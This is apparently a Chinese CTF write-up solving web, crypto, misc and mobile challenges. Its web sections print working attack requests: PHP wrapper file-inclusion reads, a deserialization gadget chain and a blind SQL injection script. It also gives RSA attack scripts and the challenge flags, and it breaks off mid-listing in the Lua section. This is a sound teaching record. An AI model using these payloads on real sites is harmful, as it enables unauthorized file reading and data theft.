Web
One Two Three
<?php
// Challenge source as served (highlight_file prints it to the visitor). Three
// parameters are required: one and two from the query string, three from the body.
highlight_file(__FILE__);
error_reporting(0); // warnings from file_get_contents()/include() are silenced, so failures are invisible
include("ans.php");
if(isset($_GET["one"]) && isset($_GET["two"]) && isset($_POST["three"]))
{
    $one = $_GET["one"];
    $two = $_GET["two"];
    $three = $_POST["three"];
    if(!empty($one) && !empty($two) && !empty($three))
    {
        // $two and $three go straight into file_get_contents(): nothing restricts them
        // to a local path, which is why the solution above can hand it data: URLs.
        // The content comparison itself is strict (===).
        if(file_get_contents($two) === "g00dJ0b" and file_get_contents($three) === "onTh1s")
        {
            var_dump($one);
            // include() of a request-controlled path: the file-inclusion sink of this level.
            // A fixed allow-list of includable files is the usual fix.
            include($one);
        }
    }
    else
        // this else belongs to the !empty() check: it only fires when the parameters
        // are present but empty; missing parameters produce no message at all
        die("Insufficient Parameters");
}
代码审计,用data伪协议给two和three赋值,利用filter伪协议给one赋值,base64作为处理器读出来
POST /?one=php://filter/convert.base64-encode/resource=ans.php&two=data://text/plain,g00dJ0b HTTP/1.1
Host: 119.61.19.212:55001
Content-Length: 40
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://119.61.19.212:55001
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://119.61.19.212:55001/?one=php://filter/convert.base64-encode/resource=ans.php&two=data://text/plain,g00dJ0b
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9853dac726c9531aa506675ab1597122
Connection: close
three=data%3A%2F%2Ftext%2Fplain%2ConTh1s
base64解码即可
<?php
// Contents of ans.php as recovered through the base64 filter chain above: the
// flag exists only in a comment, so it is in the source but never printed.
print("D0n't try t0 tr1ck me!");
// $ans = flag{8aea34fd-a111-677d-a97c-3f5e12fa16e4};
Lesen
<?php
// "Lesen" challenge source. Two sinks take request data: include($from) and unserialize($to).
error_reporting(0);
highlight_file(__FILE__);
$from = $_GET['from'];
$to = $_GET['to'];
// NOTE: stripos() returns 0 when the needle is at offset 0, and `0 != FALSE` is false
// under loose comparison, so this is not the strict filter it looks like; the
// intended check is `stripos($from, "flag") !== false`.
if(!isset($from) or !isset($to) or stripos($from, "flag")!=FALSE)
{
    $from = "behind.php";
}
include($from);// read flag.php
if(isset($to))
{
    // unserialize() on request data instantiates any loaded class (here the ones
    // declared in the file included via $from). json_decode(), or at least
    // unserialize($to, ['allowed_classes' => false]), is the safe form.
    $a = unserialize($to);
    $a->sayTheFlag();
}
先读behind.php
http://119.61.19.212:55003/?from=php://filter/convert.base64-encode/resource=behind.php&to=
base64解码
<?php
// behind.php as recovered via the base64 filter: it only declares the two classes below.
error_reporting(0);
class Test
{
    public $notthis;
    public $variable;
    // Fallback for any undefined method call (sayTheFlag() in the caller lands here).
    // It prints $notthis, so an object stored there is converted through __toString():
    // this is the link that makes the class below reachable from unserialize().
    public function __call($t1, $t2)
    {
        print($this->notthis);
    }
}
class NoUse
{
    public $notthis;
    public $class;
    // String conversion returns the body of whatever path $notthis holds — a file read
    // driven entirely by a deserialized property, i.e. the sink of this challenge.
    public function __toString()
    {
        return file_get_contents($this->notthis);
    }
}
?>
构造一下,先调call再调tostring,链子比较简单就不赘述了
<?php
// Local copy of the server's Test class. Name and property order must match the
// server's so unserialize() there rebuilds the same object; the constructor only
// pre-fills notthis with a NoUse instance.
class Test
{
    public $notthis;
    public $variable;
    public function __construct(){
        $this->notthis = new NoUse();
    }
}
// Local copy of NoUse with notthis set to the file name the chain should read.
class NoUse
{
    public $notthis;
    public $class;
    public function __construct(){
        $this->notthis = "flag.php";
    }
}
// Serialize the prepared object graph and URL-encode it for use as the `to` query parameter.
echo urlencode(serialize(new Test()));
?>
O%3A4%3A%22Test%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3BO%3A5%3A%22NoUse%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22class%22%3BN%3B%7Ds%3A8%3A%22variable%22%3BN%3B%7D
给to传参即可:
GET /?to=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3BO%3A5%3A%22NoUse%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22class%22%3BN%3B%7Ds%3A8%3A%22variable%22%3BN%3B%7D HTTP/1.1
Host: 119.61.19.212:55003
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://119.61.19.212:55003/?to=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3BO%3A5%3A%22NoUse%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22class%22%3BN%3B%7Ds%3A8%3A%22variable%22%3BN%3B%7D
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9853dac726c9531aa506675ab1597122
Connection: close
<?php
// flag.php as returned by the chain. Executed, it would only print the decoy via die();
// the real flag is visible here only because the file body was read, not run.
die("The flag is: flag{Just_K1dd1ng_Wlth_th1s_F4ke_fl4G}")
// The real flag is: flag{9cfb19ea-b219-bfed-09bc-8e1c43fb16f3}
?>
ScoreQuery
前面爆数据库、数据表、字段的没存,原理还是简单的,布尔盲注
import requests
import string  # unused

# Boolean-based blind extraction for the ScoreQuery level: one request per
# (position, candidate character), with the response length as the only oracle.
# Server-side, a parameterised query removes this oracle entirely.
flagstr = "1234567890qwertyuiopasdfghjklzxcvbnm}{-"
flag = ''
url = "http://119.61.19.217:55012/"
for i in range(1,45):
    for c in flagstr:
        tmp = url + "?id=0'/**/or/**/substr((select/**/F1ag/**/from/**/TheFl4g),{},1)='{}'%23".format(i,c)
        res = requests.get(tmp)
        # 2263 is the body length the author observed for a true condition on this instance
        if len(res.text) == 2263:
            flag += c
            print(flag)
            break
Crypto
CrackCi4er
# Public parameters handed out by CrackCi4er: two (n, e, c) triples. The two moduli
# are not coprime (see the note below), so gcd(n1, n2) splits both of them.
n1 = 11176298870415783282835275600061588657241463221871815491519552463408222565848079182034726185553217300689834006691472991129441397322597826835250447941841691221722446721416543093739804095340289908080867514473017079450311811803390124042848711639790285918640813661662931152276554784900720865966499111108283873361431767904939435365613871971085278398890357112336497323679975134482016115656435362909033743450396163540000606741105863043851991894541522258647025814542415404601472738921699995816713634130792482175987161484763035331960944948454215703767860312632963837039408460375085094414827681771078520774697140944693853984807
e1 = 65537
c1 = 2049142135212658273552941633440876974261753950640752177129652784905850352983432165679473874335026848351759145400964320244625330038089105524551008485108728021427824946995632603255126856753379578506783543964229942691440283255564049755866340136558644811545593331062075012791047810799296947253097390153311675026488654024461487543916802274460814350607787642849014894123082002047937769332643099034647856519147303533346991657725362212257992947710783698461322996483407717614984051267795550326657436918537790720050369514765616726515746420611017668922783549766178919288340405167353735762652502730158055821103551775066192064940
n2 = 14628452939723832473083511588210968910703852366589447308951932044211910559763838916687688620001947054794920424786224454850360778661660629608440528771433740169617993746720487612895876527947146072847716801945896849734515808742075452921890154367709390274374214553338701757577794537605478287979768372097249554390580052172699840182271033424438872211305351156295892595685726305130041874916916020353812984449226411372273954813167019471238042495646276279660976339456926385932462006559332070335515545249174455248514776056358317967032302203257464029754343434591788379595459973195410239904214340484044230212500028487107907195511
e2 = 257
c2 = 11943205429311148875261223425325670018169389197701624890446423663741223099186719632396529960156133015204496469625640992919935968122637192599196371711838810220085238215262686806595336187870118202291530645896788972981251362909696182206907049609819898202930423639770839482639933302200456662731930250303528462910052641021629680394116429930827997772982263970377753077015400323639702289539464290789532346689721249411805236223494026306249551854876805588677162485280664852101462907768951836328019109252702022466487857197139878204830652768250506210934257536926923356529983555063859891380882309438020999240607414375022018574614
模不互素
当存在两个公钥的 N 不互素时,我们显然可以直接对这两个数求最大公因数,然后直接获得 p,q,进而获得相应的私钥。
exp:
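import gmpy2
import binascii

# Two RSA keys that share a prime factor: gcd(n1, n2) yields it directly, after
# which each private exponent follows from phi as usual.
n1 = 11176298870415783282835275600061588657241463221871815491519552463408222565848079182034726185553217300689834006691472991129441397322597826835250447941841691221722446721416543093739804095340289908080867514473017079450311811803390124042848711639790285918640813661662931152276554784900720865966499111108283873361431767904939435365613871971085278398890357112336497323679975134482016115656435362909033743450396163540000606741105863043851991894541522258647025814542415404601472738921699995816713634130792482175987161484763035331960944948454215703767860312632963837039408460375085094414827681771078520774697140944693853984807
e1 = 65537
c1 = 2049142135212658273552941633440876974261753950640752177129652784905850352983432165679473874335026848351759145400964320244625330038089105524551008485108728021427824946995632603255126856753379578506783543964229942691440283255564049755866340136558644811545593331062075012791047810799296947253097390153311675026488654024461487543916802274460814350607787642849014894123082002047937769332643099034647856519147303533346991657725362212257992947710783698461322996483407717614984051267795550326657436918537790720050369514765616726515746420611017668922783549766178919288340405167353735762652502730158055821103551775066192064940
n2 = 14628452939723832473083511588210968910703852366589447308951932044211910559763838916687688620001947054794920424786224454850360778661660629608440528771433740169617993746720487612895876527947146072847716801945896849734515808742075452921890154367709390274374214553338701757577794537605478287979768372097249554390580052172699840182271033424438872211305351156295892595685726305130041874916916020353812984449226411372273954813167019471238042495646276279660976339456926385932462006559332070335515545249174455248514776056358317967032302203257464029754343434591788379595459973195410239904214340484044230212500028487107907195511
e2 = 257
c2 = 11943205429311148875261223425325670018169389197701624890446423663741223099186719632396529960156133015204496469625640992919935968122637192599196371711838810220085238215262686806595336187870118202291530645896788972981251362909696182206907049609819898202930423639770839482639933302200456662731930250303528462910052641021629680394116429930827997772982263970377753077015400323639702289539464290789532346689721249411805236223494026306249551854876805588677162485280664852101462907768951836328019109252702022466487857197139878204830652768250506210934257536926923356529983555063859891380882309438020999240607414375022018574614


def _to_bytes(m):
    """Big-endian byte string of the non-negative integer m (mpz or int).

    Replaces binascii.unhexlify(hex(m)[2:]), which raises on an odd-length hex
    string, i.e. whenever the top byte of the plaintext is below 0x10.
    """
    m = int(m)
    return m.to_bytes((m.bit_length() + 7) // 8, 'big')


p = gmpy2.gcd(n1, n2)
# a gcd of 1 (or of a whole modulus) means the keys share no usable factor and the
# computations below would be meaningless; fail loudly instead
assert 1 < p < n1, "moduli share no prime factor; this attack does not apply"
for n, e, c in ((n1, e1, c1), (n2, e2, c2)):
    q = n // p
    phi = (p - 1) * (q - 1)
    d = gmpy2.invert(e, phi)
    print(_to_bytes(gmpy2.powmod(c, d, n)))
#flag{0df31ff-b12f-097a-b7ab-fe1a4bfb12e5}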
Cr4ck2
# Cr4ck2 generator as published (secrets starred out): one modulus, two public
# exponents, the same message encrypted twice — the setup for the common-modulus
# attack below.
flag = "*************"
p = *************
q = *************
# NOTE(review): bin(q) is a str, so `bin(q)-2` cannot run as written; presumably
# `len(bin(q)) - 2 == 1024` (two 1024-bit primes) in the real generator.
assert(bin(q)-2) == 1024
assert(bin(p)-2) == 1024
n = p*q
phi = (p-1)*(q-1)
e1 = **
e2 = **
# pow() needs an int; the starred flag is shown as a str, so an integer conversion
# is presumably elided here as well (the exploit applies long_to_bytes to the result).
c1 = pow(flag, e1, n)
c2 = pow(flag, e2, n)
print(n)
print(e1)
print(e2)
print(c1)
print(c2)
公模攻击exp:
import gmpy2
from Crypto.Util.number import long_to_bytes

# Common-modulus attack: with e1*s + e2*t = 1 the plaintext is c1^s * c2^t mod n.
# A negative Bezout coefficient is handled by inverting the corresponding ciphertext.
n = 14571489544273684681632745165173941757355029852967262639728000988042839386897493030097099884895386115482493694058873038502860513888769546717076461092157274631880422404640774568976816310850151976919429837061384758878560393916832880369835035094654445542998583110983141044252629041042005200028747437532412882541760701913277010315019696176276304794162940731256361777150089869864848752521412637555443729084762017260965056626550279092491606837302796652497491465469860146607791410672793656097187677222298486237121302232907875363012059539134811841994652897489100941594071086553725267695160318463265760189436211892048571831049
e1 = 18181
e2 = 19937
message1 = 14086932244393217502907224674408736488830849146214227184918262698062675736724337554446711585503734671616977407523947180439538475650652413419679106435434870038055027980301567294772290568083578726775663339768961737480740922223388718943787094330870471886171540256870630059797491648906275021947443613254535459415614412289718705188895798826235866579862681303315446414825328707142227744471707921742768342732559562524019443552187374960675403256064296192626351031408014769594350992074453942709110651276633951009115468620886310509692671361261934324842739148921650085982490562922669906835464674323688759465709626540284576889210
message2 = 9788755099571270122752620318833990768386552453915390611782202313009843880011885989102462216813557305415919308702993594866012255516635580308442538867800280824955615413443022611149710694144180395588528536827198061901961298781041399064307258829088210698947995786806886824892341393690873854230422832064661235313593912677068722144241580197984421905987499008664508485233509643273752098892825326153287135195132848517181638343515469682704077797334084053581822968060796475866168907228760199308163970477417979781603099935953389513751241815586854968725454388470460653618696872424888914546835979441528674579794525553550639554293

# extended gcd gives gcd plus the coefficients s, t
gcd, s, t = gmpy2.gcdext(e1, e2)
if s < 0:
    s, message1 = -s, gmpy2.invert(message1, n)
if t < 0:
    t, message2 = -t, gmpy2.invert(message2, n)
plain = (gmpy2.powmod(message1, s, n) * gmpy2.powmod(message2, t, n)) % n
print(plain)
print(long_to_bytes(plain))
#flag{afe12ec-c1be-421f-c0fa-ea2f6ceb10a0}
n_n
ucnd fclsmn.rmjy.irdapc jdsncm zpmscjdp, almph_mn_yniz
ucnd hpfcpm jdsncm uyvz
jdsncm zdsl2
s = zpmscjdp(1024)
x = zpmscjdp(1024)
i = s * x
p = 0g130u7u3
k = zdsl2.jiwpcm(p, (s-1)*(x-1))
jiws_x = zdsl2.jiwpcm(s, x)
jiwx_s = zdsl2.jiwpcm(x, s)
d = almph_mn_yniz(uyvz)
f = zdsl2.snbdnk(d, p, i)
scjim(p)
scjim(k)
scjim(jiws_x)
scjim(jiwx_s)
scjim(f)
'''
19986419
3246030980112569716252525489178402976566547966168594693884910274513154299462041341004375201921016318938426026345098668299377474330375073434720935772407207944175167323817898036516011079576927822972280584550642421759163857196487310343842151887753901290056007928776238985151298531470667875043069631236869106891057021962478109360022955201129953336276429238305672598460147562806963064866859947227329083491706302615233310732434276569920504055705370558759864687603230396302816302264528911561986103345422868194300484993924394687653074699941027740263298870609889050004072341364150017277319759241334188164360195703910784166355
23389236347134283235213306702183810016424721867486963556461081084876520502820941836694411695676757754191365637169094291954507615676165999068189562213594619012687252636744435260033076208286475321060918985189871377901228212667433573382718485160649112811594950994116619369682212010587535385364596418447338709974
102920556609507191536438498232122774923059359709189772008951429751731499708926283579532737890030392620334257693429608011647339365489651578950937878926965514185822024062626226427621775843089345409431424163821245825850075741313035783453477904427927137045546100973267423868918950101645341426259141920145517101346
1553892238198363827492950017785469649883078335860404183601470514633985702148771439291915519584864956768837128975747502834867950051639396112333353729920983641277214334076161962538797900388907160490701194265684200572530520821773449401826082542234651817152190240489004982304794568360099499384170323027423530546020874791949260720440971235829841009999271630682762487975448340845503303511707467319967171026472363519627299488034799105120005884793797012235913877429590605758066993126024240880065915024533204819606519268788794771634158963247834960191894770256479582799808670787421459015846778168822826961225790849202125973374
'''
词频修复
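# Plaintext of the substitution-ciphered generator above (one letter maps to one
# letter). The first restoration pass had transcription errors — lowercase
# `crypto.util.number`/`getprime` (case is lost by the cipher), a non-existent
# `gmpy2.podmow`, an undefined `m`, and the first inverse misnamed `invp_k`.
from Crypto.Util.number import getPrime, bytes_to_long
from secret import flag
import gmpy2

p = getPrime(1024)
q = getPrime(1024)
n = p * q
e = 0x130f7f3  # = 19986419, the first printed value
d = gmpy2.invert(e, (p - 1) * (q - 1))
invp_q = gmpy2.invert(p, q)  # p^-1 mod q
invq_p = gmpy2.invert(q, p)  # q^-1 mod p (the exploit below calls this value invk_p)
m = bytes_to_long(flag)
c = gmpy2.powmod(m, e, n)
print(e)
print(d)
print(invp_q)
print(invq_p)
print(c)
'''
19986419
3246030980112569716252525489178402976566547966168594693884910274513154299462041341004375201921016318938426026345098668299377474330375073434720935772407207944175167323817898036516011079576927822972280584550642421759163857196487310343842151887753901290056007928776238985151298531470667875043069631236869106891057021962478109360022955201129953336276429238305672598460147562806963064866859947227329083491706302615233310732434276569920504055705370558759864687603230396302816302264528911561986103345422868194300484993924394687653074699941027740263298870609889050004072341364150017277319759241334188164360195703910784166355
23389236347134283235213306702183810016424721867486963556461081084876520502820941836694411695676757754191365637169094291954507615676165999068189562213594619012687252636744435260033076208286475321060918985189871377901228212667433573382718485160649112811594950994116619369682212010587535385364596418447338709974
102920556609507191536438498232122774923059359709189772008951429751731499708926283579532737890030392620334257693429608011647339365489651578950937878926965514185822024062626226427621775843089345409431424163821245825850075741313035783453477904427927137045546100973267423868918950101645341426259141920145517101346
1553892238198363827492950017785469649883078335860404183601470514633985702148771439291915519584864956768837128975747502834867950051639396112333353729920983641277214334076161962538797900388907160490701194265684200572530520821773449401826082542234651817152190240489004982304794568360099499384170323027423530546020874791949260720440971235829841009999271630682762487975448340845503303511707467319967171026472363519627299488034799105120005884793797012235913877429590605758066993126024240880065915024533204819606519268788794771634158963247834960191894770256479582799808670787421459015846778168822826961225790849202125973374
'''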
Rabin加密exp:
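from Crypto.Util.number import long_to_bytes
import gmpy2

# Recover p and q from the leaked (e, d, p^-1 mod q, q^-1 mod p) and decrypt c.
e = 19986419
d = 3246030980112569716252525489178402976566547966168594693884910274513154299462041341004375201921016318938426026345098668299377474330375073434720935772407207944175167323817898036516011079576927822972280584550642421759163857196487310343842151887753901290056007928776238985151298531470667875043069631236869106891057021962478109360022955201129953336276429238305672598460147562806963064866859947227329083491706302615233310732434276569920504055705370558759864687603230396302816302264528911561986103345422868194300484993924394687653074699941027740263298870609889050004072341364150017277319759241334188164360195703910784166355
invp_q = 23389236347134283235213306702183810016424721867486963556461081084876520502820941836694411695676757754191365637169094291954507615676165999068189562213594619012687252636744435260033076208286475321060918985189871377901228212667433573382718485160649112811594950994116619369682212010587535385364596418447338709974
invk_p = 102920556609507191536438498232122774923059359709189772008951429751731499708926283579532737890030392620334257693429608011647339365489651578950937878926965514185822024062626226427621775843089345409431424163821245825850075741313035783453477904427927137045546100973267423868918950101645341426259141920145517101346
c = 1553892238198363827492950017785469649883078335860404183601470514633985702148771439291915519584864956768837128975747502834867950051639396112333353729920983641277214334076161962538797900388907160490701194265684200572530520821773449401826082542234651817152190240489004982304794568360099499384170323027423530546020874791949260720440971235829841009999271630682762487975448340845503303511707467319967171026472363519627299488034799105120005884793797012235913877429590605758066993126024240880065915024533204819606519268788794771634158963247834960191894770256479582799808670787421459015846778168822826961225790849202125973374

key = e * d - 1  # = k * phi(n) for some small k, found by trial below
cnt = 0


def solve(x, y, z):
    """Integer roots of x*t**2 + y*t + z = 0 via the quadratic formula.

    Raises AssertionError when the discriminant is not a perfect square; the
    caller relies on that to discard a wrong guess of k.
    """
    decode = y ** 2 - 4 * x * z
    assert gmpy2.is_square(decode)
    root = gmpy2.isqrt(decode)
    x1 = (-y + root) // (2 * x)
    x2 = (-y - root) // (2 * x)
    return x1, x2


for k in range(3, e):
    if key % k != 0:
        continue
    cnt += 1
    phi_n = key // k
    # quadratic whose roots are the offsets that turn the two inverses into p and q
    # (see the assignment of p, q below)
    ll = invp_q - 1
    m = invp_q * invk_p - 1 + (invp_q - 1) * (invk_p - 1) - phi_n
    n = (invk_p - 1) * (invp_q * invk_p - 1)
    try:
        k1, k2 = solve(ll, m, n)
        if (invp_q * invk_p - 1) % k1 == 0:
            k2 = (invp_q * invk_p - 1) // k1
        elif (invp_q * invk_p - 1) % k2 == 0:
            k1, k2 = k2, (invp_q * invk_p - 1) // k2
        else:
            assert False
        p, q = invp_q + k2, invk_p + k1
        N = p * q
        flag = long_to_bytes(pow(c, d, N)).strip()
        print(flag)
        break
    except Exception:
        # a wrong k fails the perfect-square / divisibility checks above (or divides
        # by zero); keep searching. Was a bare `except:`, which also swallowed
        # KeyboardInterrupt inside a loop of up to ~2e7 iterations.
        pass
#flag{e171892fdcccfc5b0c390806b975a72c}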
Misc
BlackAndWhite
打开附件,发现是黑色和白色照片,猜测代表2进制,一共336张
脚本如下
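from pathlib import Path

# Each of the 336 images is either the all-white or the all-black reference picture;
# compare raw bytes to build a bit string, then read it as 8-bit characters.
# The original opened the references from one directory and the sequence from another
# (one of them redacted); a single base directory is used here.
target = Path('D:/Users/xxxx/Desktop/target')  # holds 0.png .. 335.png
white = (target / '0.png').read_bytes()   # read_bytes() closes the file; open(...).read() never did
black = (target / '1.png').read_bytes()   # kept for reference: anything that is not `white` counts as 1
flag = ''.join(
    '0' if (target / f'{i}.png').read_bytes() == white else '1'
    for i in range(336)
)
# whole bytes only; a trailing partial byte is dropped as before
ans = ''.join(chr(int(flag[i:i + 8], 2)) for i in range(0, len(flag) - len(flag) % 8, 8))
print(ans)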
flag{baaf013d-f3fa-bcbe-00fb-1e1a34bb2af1}
Analyze
PDF文件
base64编码过
VGhlIHBhc3N3b3JkIGlzIG5vdCBqdXN0IGFib3V0IGRlY29kaW5nLCBidXQgYWxzbyBoYWNraW5nIHRoZSBaSVAh
解码之后
The password is not just about decoding, but also hacking the ZIP!
提示爆破,爆破出密码为cr4ck!*
成功解压
使用stegsolve
打开图片
拿到flag
flag{abae93fb-c31f-aeaf-91fc-0f1d42ba26e4}
DocDocDoc
打开附件
D:\Users\xxxx\Desktop\Hello Flag\word\media
这个路径下有两张图片
第二张图片,使用tweakpng
修改高度为960
打开图片
pvkq{olp281m-m2pk-kmlo-81pl-2o2m08m0pmk1}
位移密码,key=10
flag{ebf281c-c2fa-acbe-81fb-2e2c08c0fca1}
Digtal_plate
流量包报错
提取usbdata脚本
#!/usr/bin/env python
# coding:utf-8
import sys
import os
import numpy as np
import matplotlib.pyplot as plt
# Module state shared with main(): the running cursor position, the points to plot,
# the scratch file tshark output is written to, and the raw report lines.
mousePositionX = 0
mousePositionY = 0
X, Y = [], []
DataFileName = "usb.dat"
data = []
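def main():
    """Extract USB HID mouse reports from a pcap with tshark and scatter-plot the cursor path.

    Usage: python UsbMiceHacker.py data.pcap [LEFT|RIGHT|MOVE|ALL]; an unknown
    action falls back to LEFT. Writes and then deletes the scratch file
    DataFileName in the working directory; exits with status 1 on bad arguments.
    Raises CalledProcessError (or FileNotFoundError) if tshark cannot be run.
    """
    global mousePositionX
    global mousePositionY
    import subprocess

    # check argv
    if len(sys.argv) != 3:
        print ("Usage : ")
        print (" python UsbMiceHacker.py data.pcap [LEFT|RIGHT|MOVE|ALL]")
        print ("Tips : ")
        print (" To use this python script , you must install the numpy,matplotlib first.")
        print (" You can use `sudo pip install matplotlib numpy` to install it")
        print ("Author : ")
        print (" WangYihang <[email protected]>")
        print (" If you have any questions , please contact me by email.")
        print (" Thank you for using.")
        sys.exit(1)
    # get argv
    pcapFilePath = sys.argv[1]
    action = sys.argv[2]
    if action not in ("LEFT", "ALL", "RIGHT", "MOVE"):
        action = "LEFT"
    # get data of pcap. Argument list plus explicit stdout redirection instead of a
    # shell string: the pcap path used to be spliced into the command line unescaped,
    # so a quote or shell metacharacter in it broke (or changed) the command.
    command = ["tshark", "-r", pcapFilePath, "-T", "fields", "-e", "usbhid.data"]
    print(" ".join(command))
    with open(DataFileName, "w") as out:
        subprocess.run(command, stdout=out, check=True)
    # read data
    with open(DataFileName, "r") as f:
        for line in f:
            # line[0:-1] would drop the last character of an unterminated final line
            data.append(line.rstrip("\n"))
    # handle move: reports are colon-separated hex bytes; the 8-byte layout carries
    # the X/Y deltas at offsets 2/4, the 4-byte layout at 1/2
    wanted = {"01": "LEFT", "02": "RIGHT", "00": "MOVE"}  # first byte: button state
    for i in data:
        Bytes = i.split(":")
        if len(Bytes) == 8:
            horizontal = 2  # -
            vertical = 4  # |
        elif len(Bytes) == 4:
            horizontal = 1  # -
            vertical = 2  # |
        else:
            continue
        offsetX = int(Bytes[horizontal], 16)
        offsetY = int(Bytes[vertical], 16)
        # deltas are signed 8-bit values
        if offsetX > 127:
            offsetX -= 256
        if offsetY > 127:
            offsetY -= 256
        mousePositionX += offsetX
        mousePositionY += offsetY
        # record the point when this report's button state is the one asked for, or for ALL;
        # Y is negated (presumably so the plot matches screen orientation)
        if action == "ALL" or wanted.get(Bytes[0]) == action:
            X.append(mousePositionX)
            Y.append(-mousePositionY)
    fig = plt.figure()
    ax1 = fig.add_subplot(111)
    ax1.set_title('[%s]-[%s] Author : WangYihang' % (pcapFilePath, action))
    ax1.scatter(X, Y, c='r', marker='o')
    plt.show()
    # clean temp data (was os.system("rm ./usb.dat"); no shell needed)
    os.remove(DataFileName)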
if __name__ == "__main__":
    # run only when executed as a script, so importing the module does not start the extractor
    main()
发现是 数位板流量(前三位是088,后8位是八个0)
判断是数位板上画图
画图脚本
import sys
import os
import numpy as np
import matplotlib.pyplot as plt


def _point(line):
    """Decode one captured report line: hex chars 4-7 are X and 8-11 are Y, each a
    little-endian 16-bit value. Y is returned negated (presumably to match screen
    orientation when plotted)."""
    x = int(line[4:6], 16) | (int(line[6:8], 16) << 8)
    y = int(line[8:10], 16) | (int(line[10:12], 16) << 8)
    return x, -y


with open("usbdata.txt", "r") as f:
    data = f.readlines()
points = [_point(line) for line in data]
X = [px for px, _ in points]
Y = [py for _, py in points]
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.set_title("key")
ax1.scatter(X, Y, c='r', marker='o')
plt.show()
画图结果如下
拿到一个key
kaseyd4wi2v3sc518dc84bsa4a96
binwalk -e 出来一个zip文件
解压密码就是上面那个
解压出一个图片
猜测是silenteye解密,解密失败
备注发现异常
写的太轻,提示到数位板画画的时候,会有压力感觉
看一下前面都有
0880应该是标识所以画点的数据应该在后面
有数值的是八位
所以x四位y四位
然后发现后面有0880,0881
两个都导出一下,0880是没按压,0881是按压,把0881为前缀的数据提取出来然后描点就行了
import matplotlib.pyplot as plt
import sys
import numpy as np
import os


def _point(line):
    """Decode one pressure-on report line (prefix 0881): hex chars 4-7 are X and
    8-11 are Y, each a little-endian 16-bit value; Y is returned negated."""
    x = int(line[4:6], 16) | (int(line[6:8], 16) << 8)
    y = int(line[8:10], 16) | (int(line[10:12], 16) << 8)
    return x, -y


with open("usbhiddata.txt", "r") as f:
    data = f.readlines()
points = [_point(line) for line in data]
X = [px for px, _ in points]
Y = [py for _, py in points]
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.set_title("key")
ax1.scatter(X, Y, c='r', marker='o')
plt.show()
提取带有压感的流量数据,画图得到
18cba496
作为key,使用silenteye解密
flag{42a12187c01a4a4f2b3f5ccd0a019656}
Mobile
andlua
apk反编译,找到res/raw路径下的lua 脚本
-- Called from the app's UI with the text view and the user's input.
-- Only the first loop and the final setText() do anything: each input_byte slot
-- 0..37 is overwritten five times in a row, so the table ends up holding just the
-- last value per slot and is then discarded. The 190 constants are still the real
-- payload: the Python decoder after this listing reads them, five per output byte,
-- as an operation list (value > 19: xor, 10..19: subtract, < 10: add).
function doEncrypt(tv,input)
    local input_byte = {}
    local input_len = string.len(input)
    for i = 1, input_len do
        input_byte[i-1] = string.byte(input, i, i)
    end
    local a = "vm_start"  -- marker string, never used
    -- constant table: five writes per slot (see header comment)
    input_byte[0] = 23
    input_byte[0] = 5
    input_byte[0] = 33
    input_byte[0] = 11
    input_byte[0] = 14
    input_byte[1] = 10
    input_byte[1] = 21
    input_byte[1] = 7
    input_byte[1] = 40
    input_byte[1] = 12
    input_byte[2] = 32
    input_byte[2] = 32
    input_byte[2] = 35
    input_byte[2] = 13
    input_byte[2] = 14
    input_byte[3] = 26
    input_byte[3] = 7
    input_byte[3] = 25
    input_byte[3] = 25
    input_byte[3] = 1
    input_byte[4] = 3
    input_byte[4] = 4
    input_byte[4] = 13
    input_byte[4] = 27
    input_byte[4] = 5
    input_byte[5] = 25
    input_byte[5] = 13
    input_byte[5] = 1
    input_byte[5] = 33
    input_byte[5] = 38
    input_byte[6] = 33
    input_byte[6] = 24
    input_byte[6] = 31
    input_byte[6] = 17
    input_byte[6] = 24
    input_byte[7] = 20
    input_byte[7] = 26
    input_byte[7] = 8
    input_byte[7] = 20
    input_byte[7] = 40
    input_byte[8] = 25
    input_byte[8] = 18
    input_byte[8] = 3
    input_byte[8] = 7
    input_byte[8] = 34
    input_byte[9] = 26
    input_byte[9] = 37
    input_byte[9] = 8
    input_byte[9] = 15
    input_byte[9] = 28
    input_byte[10] = 31
    input_byte[10] = 21
    input_byte[10] = 31
    input_byte[10] = 19
    input_byte[10] = 21
    input_byte[11] = 19
    input_byte[11] = 3
    input_byte[11] = 37
    input_byte[11] = 13
    input_byte[11] = 20
    input_byte[12] = 18
    input_byte[12] = 12
    input_byte[12] = 15
    input_byte[12] = 3
    input_byte[12] = 4
    input_byte[13] = 33
    input_byte[13] = 21
    input_byte[13] = 33
    input_byte[13] = 7
    input_byte[13] = 18
    input_byte[14] = 15
    input_byte[14] = 23
    input_byte[14] = 3
    input_byte[14] = 12
    input_byte[14] = 40
    input_byte[15] = 11
    input_byte[15] = 32
    input_byte[15] = 25
    input_byte[15] = 34
    input_byte[15] = 36
    input_byte[16] = 9
    input_byte[16] = 9
    input_byte[16] = 37
    input_byte[16] = 19
    input_byte[16] = 27
    input_byte[17] = 36
    input_byte[17] = 10
    input_byte[17] = 30
    input_byte[17] = 14
    input_byte[17] = 14
    input_byte[18] = 10
    input_byte[18] = 34
    input_byte[18] = 6
    input_byte[18] = 31
    input_byte[18] = 27
